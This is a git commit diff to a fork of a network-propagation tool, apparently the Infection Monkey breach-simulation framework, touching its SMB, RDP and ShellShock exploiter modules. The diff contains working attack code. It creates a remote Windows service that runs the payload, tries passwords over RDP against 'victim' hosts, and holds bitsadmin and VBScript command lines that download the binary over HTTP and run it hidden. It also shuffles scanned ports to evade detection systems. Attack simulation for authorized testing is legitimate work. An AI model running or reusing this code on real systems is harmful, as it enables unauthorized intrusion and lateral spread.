forked from p34709852/monkey
Merge remote-tracking branch 'origin/master'
This commit is contained in:
commit
6fcf8b2f15
|
@ -208,6 +208,8 @@ class Configuration(object):
|
||||||
|
|
||||||
# smb/wmi exploiter
|
# smb/wmi exploiter
|
||||||
smb_download_timeout = 300 # timeout in seconds
|
smb_download_timeout = 300 # timeout in seconds
|
||||||
|
smb_service_name = "InfectionMonkey"
|
||||||
|
|
||||||
|
|
||||||
# system info collection
|
# system info collection
|
||||||
collect_system_info = True
|
collect_system_info = True
|
||||||
|
|
|
@ -66,6 +66,7 @@
|
||||||
"range_size": 30,
|
"range_size": 30,
|
||||||
"rdp_use_vbs_download": true,
|
"rdp_use_vbs_download": true,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
|
"smb_service_name": "InfectionMonkey",
|
||||||
"retry_failed_explotation": true,
|
"retry_failed_explotation": true,
|
||||||
"scanner_class": "TcpScanner",
|
"scanner_class": "TcpScanner",
|
||||||
"self_delete_in_cleanup": true,
|
"self_delete_in_cleanup": true,
|
||||||
|
|
|
@ -103,6 +103,7 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
|
||||||
self._update_lock.release()
|
self._update_lock.release()
|
||||||
|
|
||||||
def _keysSender(self):
|
def _keysSender(self):
|
||||||
|
LOG.debug("Starting to send keystrokes")
|
||||||
while True:
|
while True:
|
||||||
|
|
||||||
if self.closed:
|
if self.closed:
|
||||||
|
@ -260,6 +261,8 @@ class RdpExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
|
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(host, depth-1)
|
cmdline = build_monkey_commandline(host, depth-1)
|
||||||
|
|
||||||
if self._config.rdp_use_vbs_download:
|
if self._config.rdp_use_vbs_download:
|
||||||
|
@ -286,9 +289,11 @@ class RdpExploiter(HostExploiter):
|
||||||
for password in passwords:
|
for password in passwords:
|
||||||
try:
|
try:
|
||||||
# run command using rdp.
|
# run command using rdp.
|
||||||
LOG.info("Trying rdp logging into victim %r with user %s and password '%s'",
|
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
|
||||||
host, self._config.psexec_user, password)
|
host, self._config.psexec_user, password)
|
||||||
|
|
||||||
|
LOG.info("RDP logged in to %r", host)
|
||||||
|
|
||||||
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
|
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
|
||||||
|
|
||||||
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
|
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
|
||||||
|
|
|
@ -92,7 +92,6 @@ class ShellShockExploiter(HostExploiter):
|
||||||
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
# copy the monkey
|
# copy the monkey
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
|
@ -193,7 +192,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
Checks if which urls exist
|
Checks if which urls exist
|
||||||
:return: Sequence of URLs to try and attack
|
:return: Sequence of URLs to try and attack
|
||||||
"""
|
"""
|
||||||
import grequests
|
import grequests # at this point, it monkey patches half the world and we must stop it
|
||||||
attack_path = 'http://'
|
attack_path = 'http://'
|
||||||
if is_https:
|
if is_https:
|
||||||
attack_path = 'https://'
|
attack_path = 'https://'
|
||||||
|
@ -203,6 +202,10 @@ class ShellShockExploiter(HostExploiter):
|
||||||
resps = grequests.map(reqs, size=15)
|
resps = grequests.map(reqs, size=15)
|
||||||
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
||||||
urls = [resp.url for resp in valid_resps]
|
urls = [resp.url for resp in valid_resps]
|
||||||
|
|
||||||
|
# revert monkey patch
|
||||||
|
import socket # this is the monkeypatched socket module
|
||||||
|
reload(socket)
|
||||||
return urls
|
return urls
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
|
|
@ -141,7 +141,7 @@ class SmbExploiter(HostExploiter):
|
||||||
sc_handle = resp['lpScHandle']
|
sc_handle = resp['lpScHandle']
|
||||||
|
|
||||||
# start the monkey using the SCM
|
# start the monkey using the SCM
|
||||||
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
|
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
|
||||||
lpBinaryPathName=cmdline)
|
lpBinaryPathName=cmdline)
|
||||||
service = resp['lpServiceHandle']
|
service = resp['lpServiceHandle']
|
||||||
|
|
||||||
|
|
|
@ -10,5 +10,5 @@ DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER
|
||||||
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||||
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
||||||
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
|
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
|
||||||
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
|
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
import time
|
import time
|
||||||
|
from random import shuffle
|
||||||
from network import HostScanner, HostFinger
|
from network import HostScanner, HostFinger
|
||||||
from model.host import VictimHost
|
from model.host import VictimHost
|
||||||
from network.tools import check_port_tcp
|
from network.tools import check_port_tcp
|
||||||
|
@ -19,8 +20,11 @@ class TcpScanner(HostScanner, HostFinger):
|
||||||
assert isinstance(host, VictimHost)
|
assert isinstance(host, VictimHost)
|
||||||
|
|
||||||
count = 0
|
count = 0
|
||||||
|
# maybe hide under really bad detection systems
|
||||||
|
target_ports = self._config.tcp_target_ports[:]
|
||||||
|
shuffle(target_ports)
|
||||||
|
|
||||||
for target_port in self._config.tcp_target_ports:
|
for target_port in target_ports:
|
||||||
|
|
||||||
is_open, banner = check_port_tcp(host.ip_addr,
|
is_open, banner = check_port_tcp(host.ip_addr,
|
||||||
target_port,
|
target_port,
|
||||||
|
|
|
@ -315,4 +315,12 @@ api.add_resource(Connector, '/connector')
|
||||||
api.add_resource(JobCreation, '/jobcreate')
|
api.add_resource(JobCreation, '/jobcreate')
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
|
from tornado.wsgi import WSGIContainer
|
||||||
|
from tornado.httpserver import HTTPServer
|
||||||
|
from tornado.ioloop import IOLoop
|
||||||
|
|
||||||
|
http_server = HTTPServer(WSGIContainer(app), ssl_options={'certfile': 'server.crt', 'keyfile': 'server.key'})
|
||||||
|
http_server.listen(5000)
|
||||||
|
IOLoop.instance().start()
|
||||||
|
|
||||||
|
#app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
|
||||||
|
|
|
@ -1,3 +1,4 @@
|
||||||
pyVmomi
|
pyVmomi
|
||||||
celery
|
celery
|
||||||
celery[mongodb]
|
celery[mongodb]
|
||||||
|
tornado
|
Loading…
Reference in New Issue